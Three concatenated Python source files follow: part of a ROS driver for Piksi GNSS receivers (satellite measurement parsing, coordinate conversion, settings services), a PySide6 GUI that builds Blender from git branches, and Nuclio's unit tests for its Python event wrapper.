heartbeat_msg.sbp_major_version = (msg.flags & 0xFF0000) >> 16
heartbeat_msg.external_antenna_present = (msg.flags & 0x80000000) >> 31
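# Flag layout recap (illustrative): bits 0-2 carry the error flags extracted
# above, bits 8-15 the SBP minor version, bits 16-23 the major version, and
# bit 31 the external antenna bit. For example flags = 0x80020300 decodes to
# major 2, minor 3, antenna present and no errors.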
self.publishers['heartbeat'].publish(heartbeat_msg)
# Update debug msg and publish.
self.receiver_state_msg.system_error = heartbeat_msg.system_error
self.receiver_state_msg.io_error = heartbeat_msg.io_error
self.receiver_state_msg.swift_nap_error = heartbeat_msg.swift_nap_error
self.receiver_state_msg.external_antenna_present = heartbeat_msg.external_antenna_present
self.publish_receiver_state_msg()
if self.base_station_mode:
self.multicaster.sendSbpPacket(msg_raw)
def cb_sbp_measurement_state(self, msg_raw, **metadata):
msg = MsgMeasurementState(msg_raw)
measurement_state_msg = piksi_rtk_msgs.msg.MeasurementState_V2_4_1()
measurement_state_msg.header.stamp = rospy.Time.now()
measurement_state_msg.sat = []
measurement_state_msg.code = []
measurement_state_msg.cn0 = []
# Temporary variables for receiver state message.
num_gps_sat = 0
cn0_gps = []
num_sbas_sat = 0
cn0_sbas = []
num_glonass_sat = 0
cn0_glonass = []
num_bds_sat = 0
cn0_bds = []
num_gal_sat = 0
cn0_gal = []
for single_measurement_state in msg.states:
# Use satellites with valid cn0.
if single_measurement_state.cn0 > 0.0:
measurement_state_msg.sat.append(single_measurement_state.mesid.sat)
measurement_state_msg.code.append(single_measurement_state.mesid.code)
measurement_state_msg.cn0.append(single_measurement_state.cn0)
# Receiver state fields.
code = single_measurement_state.mesid.code
if code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GPS_L1CA or \
code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GPS_L2CM or \
code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GPS_L1P or \
code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GPS_L2P:
num_gps_sat += 1
cn0_gps.append(single_measurement_state.cn0)
elif code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_SBAS_L1CA:
num_sbas_sat += 1
cn0_sbas.append(single_measurement_state.cn0)
elif code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GLO_L1CA or \
code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GLO_L2CA:
num_glonass_sat += 1
cn0_glonass.append(single_measurement_state.cn0)
elif code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_BDS2_B1 or \
code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_BDS2_B2:
num_bds_sat += 1
cn0_bds.append(single_measurement_state.cn0)
elif code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GAL_E1B or \
code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GAL_E7I:
num_gal_sat += 1
cn0_gal.append(single_measurement_state.cn0)
else:
rospy.logwarn("[cb_sbp_measurement_state]: Unknown satellite code %d.", code)
# Publish if there's at least one element in each array.
if len(measurement_state_msg.sat) \
and len(measurement_state_msg.code) \
and len(measurement_state_msg.cn0):
self.publishers['measurement_state'].publish(measurement_state_msg)
# Update debug msg and publish.
self.receiver_state_msg.num_sat = num_gps_sat + num_sbas_sat + num_glonass_sat + num_bds_sat + num_gal_sat
self.receiver_state_msg.sat = measurement_state_msg.sat
self.receiver_state_msg.cn0 = measurement_state_msg.cn0
self.receiver_state_msg.num_gps_sat = num_gps_sat
self.receiver_state_msg.cn0_gps = cn0_gps
self.receiver_state_msg.num_sbas_sat = num_sbas_sat
self.receiver_state_msg.cn0_sbas = cn0_sbas
self.receiver_state_msg.num_glonass_sat = num_glonass_sat
self.receiver_state_msg.cn0_glonass = cn0_glonass
self.receiver_state_msg.num_bds_sat = num_bds_sat
self.receiver_state_msg.cn0_bds = cn0_bds
self.receiver_state_msg.num_gal_sat = num_gal_sat
self.receiver_state_msg.cn0_gal = cn0_gal
self.publish_receiver_state_msg()
def publish_receiver_state_msg(self):
self.receiver_state_msg.header.stamp = rospy.Time.now()
self.publishers['receiver_state'].publish(self.receiver_state_msg)
def init_geodetic_reference(self, latitude, longitude, altitude):
if self.origin_enu_set:
return
self.latitude0 = math.radians(latitude)
self.longitude0 = math.radians(longitude)
self.altitude0 = altitude
(self.initial_ecef_x, self.initial_ecef_y, self.initial_ecef_z) = self.geodetic_to_ecef(latitude, longitude,
altitude)
# Compute ECEF to NED.
phiP = math.atan2(self.initial_ecef_z,
math.sqrt(math.pow(self.initial_ecef_x, 2) + math.pow(self.initial_ecef_y, 2)))
self.ecef_to_ned_matrix = self.n_re(phiP, self.longitude0)
self.origin_enu_set = True
rospy.loginfo("Origin ENU frame set to: %.6f, %.6f, %.2f" % (latitude, longitude, altitude))
def geodetic_to_ecef(self, latitude, longitude, altitude):
# Convert geodetic coordinates to ECEF.
# http://code.google.com/p/pysatel/source/browse/trunk/coord.py?r=22
lat_rad = math.radians(latitude)
lon_rad = math.radians(longitude)
xi = math.sqrt(1 - PiksiMulti.kFirstEccentricitySquared * math.sin(lat_rad) * math.sin(lat_rad))
x = (PiksiMulti.kSemimajorAxis / xi + altitude) * math.cos(lat_rad) * math.cos(lon_rad)
y = (PiksiMulti.kSemimajorAxis / xi + altitude) * math.cos(lat_rad) * math.sin(lon_rad)
z = (PiksiMulti.kSemimajorAxis / xi * (1 - PiksiMulti.kFirstEccentricitySquared) + altitude) * math.sin(lat_rad)
return x, y, z
def ecef_to_ned(self, x, y, z):
# Convert an ECEF position into the local-tangent-plane NED frame,
# relative to the stored ECEF origin of the local frame.
vect = np.array([0.0, 0.0, 0.0])
vect[0] = x - self.initial_ecef_x
vect[1] = y - self.initial_ecef_y
vect[2] = z - self.initial_ecef_z
ret = self.ecef_to_ned_matrix.dot(vect)
n = ret[0]
e = ret[1]
d = -ret[2]
return n, e, d
def geodetic_to_enu(self, latitude, longitude, altitude):
# Geodetic position to local ENU frame
(x, y, z) = self.geodetic_to_ecef(latitude, longitude, altitude)
(north, east, down) = self.ecef_to_ned(x, y, z)
# Return East, North, Up coordinate.
return east, north, -down
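# Note (explanatory comment, not from the original source): n_re below returns the rotation matrix
# whose rows are the local north, east, and up unit vectors expressed in ECEF coordinates at the
# given latitude/longitude. ecef_to_ned therefore negates the third component of the rotated vector
# to obtain "down", and geodetic_to_enu reorders (n, e, -d) into the ENU convention (east, north, up).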
def n_re(self, lat_radians, lon_radians):
s_lat = math.sin(lat_radians)
s_lon = math.sin(lon_radians)
c_lat = math.cos(lat_radians)
c_lon = math.cos(lon_radians)
ret = np.eye(3)
ret[0, 0] = -s_lat * c_lon
ret[0, 1] = -s_lat * s_lon
ret[0, 2] = c_lat
ret[1, 0] = -s_lon
ret[1, 1] = c_lon
ret[1, 2] = 0.0
ret[2, 0] = c_lat * c_lon
ret[2, 1] = c_lat * s_lon
ret[2, 2] = s_lat
return ret
def enu_to_pose_msg(self, east, north, up, variance):
pose_msg = PoseWithCovariance()
# Fill covariance using variance parameter of GPS.
pose_msg.covariance[6 * 0 + 0] = variance[0]
pose_msg.covariance[6 * 1 + 1] = variance[1]
pose_msg.covariance[6 * 2 + 2] = variance[2]
# Fill pose section.
pose_msg.pose.position.x = east
pose_msg.pose.position.y = north
pose_msg.pose.position.z = up
# GPS points do not have orientation
pose_msg.pose.orientation.x = 0.0
pose_msg.pose.orientation.y = 0.0
pose_msg.pose.orientation.z = 0.0
pose_msg.pose.orientation.w = 1.0
return pose_msg
def enu_to_point_msg(self, east, north, up):
point_msg = Point()
# Fill pose section.
point_msg.x = east
point_msg.y = north
point_msg.z = up
return point_msg
def enu_to_transform_msg(self, east, north, up):
transform_msg = Transform()
# Fill message.
transform_msg.translation.x = east
transform_msg.translation.y = north
transform_msg.translation.z = up
# Set orientation to the identity quaternion, as orientation does not really matter here.
transform_msg.rotation.x = 0.0
transform_msg.rotation.y = 0.0
transform_msg.rotation.z = 0.0
transform_msg.rotation.w = 1.0
return transform_msg
def reset_piksi_service_callback(self, request):
response = std_srvs.srv.SetBoolResponse()
if request.data:
# Send reset message.
reset_sbp = SBP(SBP_MSG_RESET)
reset_sbp.payload = ''
reset_msg = reset_sbp.pack()
self.driver.write(reset_msg)
rospy.logwarn("Swift receiver hard reset via rosservice call.")
# Init messages with "memory".
self.receiver_state_msg = self.init_receiver_state_msg()
self.num_wifi_corrections = self.init_num_corrections_msg()
response.success = True
response.message = "Swift receiver reset command sent."
else:
response.success = False
response.message = "Swift receiver reset command not sent."
return response
def settings_write_server(self, request):
response = SettingsWriteResponse()
self.settings_write(request.section_setting, request.setting, request.value)
response.success = True
response.message = "Settings written. Please use service 'settings_read_req' if you want to double check."
return response
def settings_read_req_server(self, request):
response = SettingsReadReqResponse()
# Make sure we do not have any old setting in memory.
self.clear_last_setting_read()
self.settings_read_req(request.section_setting, request.setting)
response.success = True
response.message = "Read-request sent. Please use 'settings_read_resp' to get the response."
return response
def settings_read_resp_server(self, request):
response = SettingsReadRespResponse()
if self.last_section_setting_read and self.last_setting_read and self.last_value_read:
response.success = True
response.message = ""
response.section_setting = self.last_section_setting_read
response.setting = self.last_setting_read
response.value = self.last_value_read
else:
response.success = False
response.message = "Please trigger a new 'settings_read_req' via service call."
response.section_setting = []
response.setting = []
response.value = []
self.clear_last_setting_read()
return response
def settings_save_callback(self, request):
response = std_srvs.srv.SetBoolResponse()
if request.data:
self.settings_save()
response.success = True
response.message = "Swift receiver settings have been saved to flash."
else:
response.success = False
response.message = "Please pass 'true' to this service call to explicitly save to flash the local settings."
return response
def get_installed_sbp_version(self):
command = ["pip", "show", "sbp"]
pip_show_output = subprocess.Popen(command, stdout=subprocess.PIPE)
out, error = pip_show_output.communicate()
# Search for version number, output assumed in the form "Version: X.X.X"
version_output = re.search(r"Version: \d+\.\d+\.\d+", out)
if version_output is None:
# No version found
rospy.logfatal("No SBP library found. Please install it by using script in 'install' folder.")
rospy.signal_shutdown("No SBP library found. Please install it by using script in 'install' folder.")
return -1
else:
# extract version number
version_output_string = version_output.group()
version_number = re.search(r"\d+\.\d+\.\d+", version_output_string)
return version_number.group()
def settings_write(self, section_setting, setting, value):
"""
Write the given configuration value to the Swift receiver.
"""
setting_string = '%s\0%s\0%s\0' % (section_setting, setting, value)
write_msg = MsgSettingsWrite(setting=setting_string)
self.framer(write_msg)
def settings_save(self):
"""
Save settings message persists the device's current settings
configuration to its on-board flash memory file system.
"""
save_msg = MsgSettingsSave()
self.framer(save_msg)
def settings_read_req(self, section_setting, setting):
"""
Request a configuration value from the Swift receiver.
"""
setting_string = '%s\0%s\0' % (section_setting, setting)
read_req_msg = MsgSettingsReadReq(setting=setting_string)
self.framer(read_req_msg)
def cb_settings_read_resp(self, msg_raw, **metadata):
"""
Response to a settings_read_req.
"""
msg = MsgSettingsReadResp(msg_raw)
setting_string = msg.setting.split('\0')
self.last_section_setting_read = setting_string[0]
self.last_setting_read = setting_string[1]
self.last_value_read = setting_string[2]
def settings_read_by_index_req(self, index):
"""
Request a configuration value from the Swift receiver by parameter index number.
"""
read_req_by_index_msg = MsgSettingsReadByIndexReq(index=index)
self.framer(read_req_by_index_msg)
def cb_sbp_settings_read_by_index_resp(self, msg_raw, **metadata):
"""
Response to a settings_read_by_index_req.
"""
msg = MsgSettingsReadByIndexResp(msg_raw)
setting_string = msg.setting.split('\0')
self.last_section_setting_read = setting_string[0]
self.last_setting_read = setting_string[1]
self.last_value_read = setting_string[2]
def clear_last_setting_read(self):
self.last_section_setting_read = []
self.last_setting_read = []
self.last_value_read = []
|
main.py
|
import threading
import ctypes
import subprocess
import os
import sys
import platform
from PySide6.QtWidgets import (QMainWindow, QApplication, QLabel, QPushButton, QComboBox, QVBoxLayout, QHBoxLayout, QWidget)
from PySide6.QtCore import Slot, Qt, QFile, QTextStream
from PySide6.QtGui import QPixmap, QIcon, QAction
from utils.preferences import *
from shutil import rmtree
class BlenderUpdater(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.title = "Blender Updater"
self.base_path, self.branches_path, self.lib_path = self.loadConfig()
self.base_path += "/"
self.os = platform.system()
self.initUI()
self.comboChanged()
def initUI(self):
self.setWindowTitle(self.title)
git_command = subprocess.run(["git", "-C", self.base_path, "branch", "-a", "--sort=-committerdate"], stdout=subprocess.PIPE)
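# Parsing assumption (comment added for clarity): the `git branch -a` output is expected to contain a
# "remotes/origin/HEAD -> origin/<default>" entry; everything after the "->" token is treated as the
# list of branch refs, and each ref is later reduced to its final path component when filling the combo box.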
raw_data = str(git_command).split("->")[1].split()
filtered_data = []
main_widget = QWidget()
self.open_log_action = QAction("Open build log", self)
self.open_log_action.triggered.connect(self.openBuildLog)
self.clean_up_action = QAction("Clean up", self)
self.clean_up_action.triggered.connect(self.startCleanupThread)
self.remove_branch_action = QAction("Remove branch", self)
self.remove_branch_action.triggered.connect(self.removeBranch)
menu_bar = self.menuBar()
file_menu = menu_bar.addMenu("File")
file_menu.addAction(self.open_log_action)
file_menu.addAction(self.clean_up_action)
file_menu.addAction(self.remove_branch_action)
title_label = QLabel("Blender Updater")
title_label.setAlignment(Qt.AlignCenter)
pixmap = QPixmap("./assets/gear.png")
icon = QIcon(pixmap)
self.parameters_button = QPushButton()
self.parameters_button.setFixedWidth(25)
self.parameters_button.setIcon(icon)
self.parameters_button.setIconSize(pixmap.rect().size())
self.parameters_button.clicked.connect(self.preferencesCommand)
self.branches_combo = QComboBox(self)
for data in raw_data:
branch_name = data.split("/")[-1].split("\\n")[0]
if branch_name not in filtered_data:
filtered_data.append(branch_name)
self.branches_combo.addItem(branch_name)
self.branches_combo.currentTextChanged.connect(self.comboChanged)
self.submit_button = QPushButton("Build selected branch")
self.submit_button.clicked.connect(self.startBuildThread)
self.progress_label = QLabel("")
self.abort_button = QPushButton("Abort current build")
self.abort_button.clicked.connect(self.abortBuild)
self.abort_button.setEnabled(False)
self.start_branch_button = QPushButton("Start selected build")
self.start_branch_button.clicked.connect(self.startBuild)
self.start_branch_button.setEnabled(False)
self.horizon_layout = QHBoxLayout()
self.horizon_layout.addWidget(title_label)
self.horizon_layout.addWidget(self.parameters_button)
self.vert_layout = QVBoxLayout()
self.vert_layout.addLayout(self.horizon_layout)
self.vert_layout.addWidget(self.branches_combo)
self.vert_layout.addWidget(self.submit_button)
self.vert_layout.addWidget(self.progress_label)
self.vert_layout.addWidget(self.abort_button)
self.vert_layout.addWidget(self.start_branch_button)
main_widget.setLayout(self.vert_layout)
self.setCentralWidget(main_widget)
def buildBlender(self, stop_event):
self.submit_button.setEnabled(False)
self.start_branch_button.setEnabled(False)
self.abort_button.setEnabled(True)
parameters = self.getUpdateScriptParameters(self.branches_combo.currentText())
with subprocess.Popen(parameters, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, preexec_fn=self.getPreexecCallback()) as proc:
self.child_process = proc
text = ""
loop = 0
while proc.poll() is None:
output = proc.stdout.readline()
output_string = output.strip().decode("utf-8")
if output_string:
progress = True
if output_string == "CHECKOUT":
text = "(1/4) - Checkout"
self.title = "(1/4) - Blender Updater"
elif output_string == "UPDATE":
text = "(2/4) - Update"
self.title = "(2/4) - Blender Updater"
elif output_string == "BUILD":
text = "(3/4) - Build"
self.title = "(3/4) - Blender Updater"
elif output_string == "Error during build":
progress = False
text = "Error during build"
self.title = "Blender Updater"
if progress:
dots = int(loop % 4)
dots_text = ""
for i in range(dots):
dots_text += "."
self.progress_label.setText(text + dots_text)
self.setWindowTitle(self.title)
print(output_string)
loop += 1
self.progress_label.setText("(4/4) - Done")
self.title = "Blender Updater"
self.abort_button.setEnabled(False)
self.start_branch_button.setEnabled(True)
self.submit_button.setEnabled(True)
self.setWindowTitle(self.title)
if self.os == "Windows":
for i in range(5):
ctypes.windll.user32.FlashWindow(ctypes.windll.kernel32.GetConsoleWindow(), True)
self.cancelThread()
def cleanupBlender(self, stop_event):
parameters = self.getCleanupScriptParameters()
with subprocess.Popen(parameters, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, preexec_fn=self.getPreexecCallback()) as proc:
while proc.poll() is None:
output = proc.stdout.readline()
output_string = output.strip().decode("utf-8")
print(output_string)
self.cancelThread()
def getUpdateScriptParameters(self, branch_name):
if self.os == "Windows":
return [os.path.dirname(__file__) + "/utils/update.bat", branch_name, self.base_path]
else:
return ["sh", "./utils/update.sh", branch_name, self.base_path, self.branches_path]
def getCleanupScriptParameters(self):
if self.os == "Windows":
return [os.path.dirname(__file__) + "/utils/cleanup.bat", self.lib_path, self.base_path]
else:
return None
def getPreexecCallback(self):
if self.os == "Windows":
return None
else:
return os.setsid
def getBranchName(self):
'''
Get the branch name to be used in update.sh and linux build paths; assume "master" if nothing is selected
'''
selected_branch = self.branches_combo.currentText()
return selected_branch if selected_branch else "master"
def getBuildPath(self):
if self.os == "Windows":
return self.branches_path + "/" + self.branches_combo.currentText() + "_branch/bin/Release/blender.exe"
else:
return os.path.join(self.branches_path, self.getBranchName(), "bin/blender")
def getBuildLogPath(self):
if self.os == "Windows":
return self.branches_path + "/" + self.branches_combo.currentText() + "_branch/Build.log"
else:
return ""
def abortBuild(self):
if self.child_process:
self.child_process.terminate()
self.stop_event.set()
self.abort_button.setEnabled(False)
self.start_branch_button.setEnabled(True)
self.submit_button.setEnabled(True)
self.progress_label.setText("Aborted")
self.title = "Blender Updater"
self.setWindowTitle(self.title)
def startBuildThread(self):
if os.path.isfile("./utils/preferences.conf"):
self.stop_event = threading.Event()
self.c_thread = threading.Thread(target=self.buildBlender, args=(self.stop_event, ))
self.c_thread.start()
else:
self.preferencesCommand()
def startCleanupThread(self):
if os.path.isfile("./utils/preferences.conf"):
self.stop_event = threading.Event()
self.c_thread = threading.Thread(target=self.cleanupBlender, args=(self.stop_event, ))
self.c_thread.start()
else:
self.preferencesCommand()
def comboChanged(self):
#path = self.branches_path + "/" + self.branches_combo.currentText() + "_branch/bin/Release/blender.exe"
if os.path.exists(self.getBuildPath()):
self.start_branch_button.setEnabled(True)
else:
self.start_branch_button.setEnabled(False)
def preferencesCommand(self):
dialog = BlenderUpdaterPreferences(self)
dialog.exec()
def startBuild(self):
path = self.getBuildPath()
print("START : " + path)
subprocess.Popen([path])
def cancelThread(self):
self.stop_event.set()
def loadConfig(self):
if not os.path.isfile("./utils/preferences.conf"):
self.preferencesCommand()
with open("./utils/preferences.conf", "r") as f:
lines = f.readlines()
try:
return lines[0].strip("\n"), lines[1].strip("\n"), lines[2].strip("\n")
except IndexError: # User messed with conf file
pass
return "", "", ""
def openBuildLog(self):
if os.path.isfile(self.getBuildLogPath()):
os.startfile(self.getBuildLogPath())
def removeBranch(self):
selected_branch = self.branches_combo.currentText()
if selected_branch:
branch_path = f"{self.branches_path}/{selected_branch}_branch"
if os.path.isdir(branch_path):
print(f"REMOVING : {branch_path}")
rmtree(branch_path)
def main():
app = QApplication(sys.argv)
file = QFile("./assets/dark.qss")
file.open(QFile.ReadOnly | QFile.Text)
stream = QTextStream(file)
app.setStyleSheet(stream.readAll())
widget = BlenderUpdater()
widget.resize(300, 200)
widget.show()
sys.exit(app.exec())
if __name__ == "__main__":
main()
|
test_wrapper.py
|
# Copyright 2017 The Nuclio Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import functools
import http.client
import json
import logging
import operator
import os
import socket
import socketserver
import struct
import sys
import tempfile
import threading
import time
import unittest.mock
import msgpack
import nuclio_sdk
import nuclio_sdk.helpers
import _nuclio_wrapper as wrapper
class TestSubmitEvents(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._decode_event_strings = False
def setUp(self):
self._loop = asyncio.get_event_loop()
self._loop.set_debug(True)
self._temp_path = tempfile.mkdtemp(prefix='nuclio-test-py-wrapper')
# write handler to temp path
self._handler_path = self._write_handler(self._temp_path)
# set PYTHONPATH to include temp path
sys.path.append(self._temp_path)
# generate socket path
self._socket_path = os.path.join(self._temp_path, 'nuclio.sock')
# create transport
self._unix_stream_server = self._create_unix_stream_server(self._socket_path)
# create logger
self._logger = nuclio_sdk.Logger(logging.DEBUG)
self._logger.set_handler('test-default', sys.stdout, nuclio_sdk.logger.HumanReadableFormatter())
self._platform_kind = 'test'
self._default_test_handler = 'reverser:handler'
# create a wrapper
self._wrapper = wrapper.Wrapper(self._logger,
self._loop,
self._default_test_handler,
self._socket_path,
self._platform_kind,
decode_event_strings=self._decode_event_strings)
self._loop.run_until_complete(self._wrapper.initialize())
def tearDown(self):
sys.path.remove(self._temp_path)
self._wrapper._processor_sock.close()
self._unix_stream_server.server_close()
self._unix_stream_server.shutdown()
self._unix_stream_server_thread.join()
def test_async_handler(self):
"""Test function decorated with async and running an event loop"""
recorded_events = []
async def event_recorder(context, event):
async def append_event(_event):
context.logger.debug_with('sleeping', event=repr(_event.id))
await asyncio.sleep(0)
context.logger.debug_with('appending event', event=repr(_event.id))
recorded_events.append(_event)
await asyncio.sleep(0)
# using `ensure_future` for backwards compatibility with Python 3.6 (on >= 3.7 you would use `create_task`)
# https://docs.python.org/3/library/asyncio-task.html#asyncio.create_task
asyncio.ensure_future(append_event(event), loop=self._loop)
return 'ok'
num_of_events = 10
events = (
nuclio_sdk.Event(_id=i, body='e{}'.format(i))
for i in range(num_of_events)
)
self._send_events(events)
self._wrapper._is_entrypoint_coroutine = True
self._wrapper._entrypoint = event_recorder
self._wrapper._processor_sock.setblocking(False)
self._loop.run_until_complete(self._wrapper.serve_requests(num_of_events))
self._loop.run_until_complete(self._loop.shutdown_asyncgens())
self.assertEqual(num_of_events, len(recorded_events), 'wrong number of events')
# we expect the events to be ordered because, although the handler is "asynchronous", the processor
# blocks until it receives a response for each event.
for recorded_event_index, recorded_event in enumerate(sorted(recorded_events, key=operator.attrgetter('id'))):
self.assertEqual(recorded_event_index, recorded_event.id)
self.assertEqual('e{}'.format(recorded_event_index), self._ensure_str(recorded_event.body))
def test_non_utf8_headers(self):
"""
This test validates the expected behavior for non-utf8 event field contents.
It sends 3 events, where the middle one has non-utf8 contents.
Non-utf8 content should be allowed when NOT decoding strings, and an error is expected when decoding is enabled.
:return:
"""
self._wait_for_socket_creation()
self._wrapper._entrypoint = lambda context, event: self._ensure_str(event.body)
events = [
json.loads(nuclio_sdk.Event(_id=str(i), body='e{0}'.format(i)).to_json())
for i in range(3)
]
# middle event is malformed
malformed_event_index = len(events) // 2
events[malformed_event_index]['headers']['x-nuclio'] = b'\xda'
# send events
t = threading.Thread(target=self._send_events, args=(events,))
t.start()
asyncio.get_event_loop().run_until_complete(self._wrapper.serve_requests(num_requests=len(events)))
t.join()
# processor start
# duration
# function response
# malformed log line (wrapper)
# malformed response
# duration
# function response
expected_messages = 7
self._wait_until_received_messages(expected_messages)
malformed_response = self._unix_stream_server._messages[-3]['body']
if self._decode_event_strings:
# msgpack would fail decoding a non utf8 string when deserializing the event
self.assertEqual(http.client.INTERNAL_SERVER_ERROR, malformed_response['status_code'])
else:
self.assertEqual(http.client.OK, malformed_response['status_code'])
self.assertEqual(events[malformed_event_index]['body'], malformed_response['body'])
# ensure messages coming after malformed request are still valid
last_function_response = self._unix_stream_server._messages[-1]['body']
self.assertEqual(http.client.OK, last_function_response['status_code'])
self.assertEqual(events[-1]['body'], last_function_response['body'])
def test_bad_function_code(self):
def raise_exception(ctx, event):
raise RuntimeError(error_message)
error_message = 'Im a bad entrypoint'
self._wait_for_socket_creation()
self._send_event(nuclio_sdk.Event(_id='1'))
self._wrapper._entrypoint = raise_exception
asyncio.get_event_loop().run_until_complete(self._wrapper.serve_requests(num_requests=1))
# processor start, function log line, response body
self._wait_until_received_messages(3)
# extract the response
response = next(message['body']
for message in self._unix_stream_server._messages
if message['type'] == 'r')
response_body = response['body']
self.assertIn(error_message, response_body)
def test_event_illegal_message_size(self):
def _send_illegal_message_size():
self._unix_stream_server._connection_socket.sendall(struct.pack(">I", 0))
self._wait_for_socket_creation()
t = threading.Thread(target=_send_illegal_message_size)
t.start()
self._wrapper._entrypoint = unittest.mock.MagicMock()
self._wrapper._entrypoint.assert_not_called()
with self.assertRaises(SystemExit):
asyncio.get_event_loop().run_until_complete(self._wrapper.serve_requests(num_requests=1))
t.join()
def test_single_event(self):
reverse_text = 'reverse this'
# send the event
self._wait_for_socket_creation()
t = threading.Thread(target=self._send_event, args=(nuclio_sdk.Event(_id=1, body=reverse_text),))
t.start()
asyncio.get_event_loop().run_until_complete(self._wrapper.serve_requests(num_requests=1))
t.join()
# processor start, function log line, response body, duration messages
self._wait_until_received_messages(4)
# extract the response
response = next(message['body']
for message in self._unix_stream_server._messages
if message['type'] == 'r')
response_body = response['body'][::-1]
self.assertEqual(reverse_text, response_body)
def test_blast_events(self):
"""Test when many >> 10 events are being sent in parallel"""
def record_event(recorded_events, ctx, event):
recorded_events.add(event.id)
recorded_event_ids = set()
expected_events_length = 10000
events = (
nuclio_sdk.Event(_id=i, body='e{}'.format(i))
for i in range(expected_events_length)
)
t = threading.Thread(target=self._send_events, args=(events,))
t.start()
self._wrapper._entrypoint = functools.partial(record_event, recorded_event_ids)
asyncio.get_event_loop().run_until_complete(self._wrapper.serve_requests(num_requests=expected_events_length))
t.join()
# record incoming events
self.assertEqual(expected_events_length, len(recorded_event_ids), 'Wrong number of events')
def test_multi_event(self):
"""Test when two events fit inside on TCP packet"""
recorded_events = []
def event_recorder(ctx, event):
recorded_events.append(event)
return 'OK'
num_of_events = 10
events = (
nuclio_sdk.Event(_id=i, body='e{}'.format(i))
for i in range(num_of_events)
)
self._send_events(events)
self._wrapper._entrypoint = event_recorder
asyncio.get_event_loop().run_until_complete(self._wrapper.serve_requests(num_of_events))
self.assertEqual(num_of_events, len(recorded_events), 'wrong number of events')
for recorded_event_index, recorded_event in enumerate(sorted(recorded_events, key=operator.attrgetter('id'))):
self.assertEqual(recorded_event_index, recorded_event.id)
self.assertEqual('e{}'.format(recorded_event_index), self._ensure_str(recorded_event.body))
# to run memory profiling test, uncomment the tests below
# and from terminal run with
# > mprof run python -m py.test test_wrapper.py::TestSubmitEvents::test_memory_profiling_<num> --full-trace
# and to get its plot use:
# > mprof plot --backend agg --output <filename>.png
# def test_memory_profiling_100(self):
# self._run_memory_profiling(100)
#
# def test_memory_profiling_1k(self):
# self._run_memory_profiling(1000)
#
# def test_memory_profiling_10k(self):
# self._run_memory_profiling(10000)
#
# def test_memory_profiling_100k(self):
# self._run_memory_profiling(100000)
#
# def _run_memory_profiling(self, num_of_events):
# import memory_profiler
# self._wait_for_socket_creation()
# self._wrapper._entrypoint = unittest.mock.MagicMock()
# self._wrapper._entrypoint.return_value = {}
# events = (
# json.loads(nuclio_sdk.Event(_id=str(i), body='e{0}'.format(i)).to_json())
# for i in range(num_of_events)
# )
# threading.Thread(target=self._send_events, args=(events,)).start()
# with open('test_memory_profiling_{0}.txt'.format(num_of_events), 'w') as f:
# profiled_serve_requests_func = memory_profiler.profile(self._wrapper.serve_requests,
# precision=4,
# stream=f)
# profiled_serve_requests_func(num_requests=num_of_events)
# self.assertEqual(num_of_events, self._wrapper._entrypoint.call_count, 'Received unexpected number of events')
def _send_events(self, events):
self._wait_for_socket_creation()
for event in events:
self._send_event(event)
def _send_event(self, event):
if not isinstance(event, dict):
event = self._event_to_dict(event)
# event to a msgpack body message
body = msgpack.Packer().pack(event)
# big endian body len
body_len = struct.pack(">I", len(body))
# first write body length
self._unix_stream_server._connection_socket.sendall(body_len)
# then write body content
self._unix_stream_server._connection_socket.sendall(body)
def _get_packed_event_body_len(self, event):
return len(msgpack.Packer().pack(self._event_to_dict(event)))
def _event_to_dict(self, event):
return json.loads(event.to_json())
def _wait_for_socket_creation(self, timeout=10, interval=0.1):
# wait for socket connection
while self._unix_stream_server._connection_socket is None and timeout > 0:
time.sleep(interval)
timeout -= interval
def _wait_until_received_messages(self, minimum_messages_length, timeout=10, interval=1):
while timeout > 0:
time.sleep(interval)
current_messages_length = len(self._unix_stream_server._messages)
if current_messages_length >= minimum_messages_length:
return
self._logger.debug_with('Waiting for messages to arrive',
current_messages_length=current_messages_length,
minimum_messages_length=minimum_messages_length)
timeout -= interval
raise RuntimeError('Failed waiting for messages')
def _create_unix_stream_server(self, socket_path):
unix_stream_server = _SingleConnectionUnixStreamServer(socket_path, _Connection)
# create a thread and listen forever on server
self._unix_stream_server_thread = threading.Thread(target=unix_stream_server.serve_forever)
self._unix_stream_server_thread.daemon = True
self._unix_stream_server_thread.start()
return unix_stream_server
def _ensure_str(self, s, encoding='utf-8', errors='strict'):
# Optimization: Fast return for the common case.
if type(s) is str:
return s
if isinstance(s, bytes):
return s.decode(encoding, errors)
raise TypeError(f"not expecting type '{type(s)}'")
def _write_handler(self, temp_path):
handler_code = '''import sys
def handler(ctx, event):
"""Return reversed body as string"""
body = event.body
if isinstance(event.body, bytes):
body = event.body.decode('utf-8')
ctx.logger.warn('the end is nigh')
return body[::-1]
'''
handler_path = os.path.join(temp_path, 'reverser.py')
with open(handler_path, 'w') as out:
out.write(handler_code)
return handler_path
class TestSubmitEventsDecoded(TestSubmitEvents):
@classmethod
def setUpClass(cls):
super(TestSubmitEventsDecoded, cls).setUpClass()
cls._decode_event_strings = True
class _SingleConnectionUnixStreamServer(socketserver.UnixStreamServer):
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
socketserver.UnixStreamServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate)
self._connection_socket = None # type: socket.socket
